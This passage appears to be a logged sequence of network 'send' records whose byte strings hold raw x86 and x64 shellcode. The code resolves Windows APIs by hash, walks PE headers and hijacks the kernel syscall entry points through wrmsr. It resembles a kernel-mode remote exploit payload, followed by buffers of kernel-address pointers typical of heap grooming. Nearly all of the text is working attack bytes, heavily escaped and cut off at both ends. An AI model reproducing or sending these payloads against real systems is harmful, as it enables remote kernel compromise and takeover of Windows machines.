xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 9, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y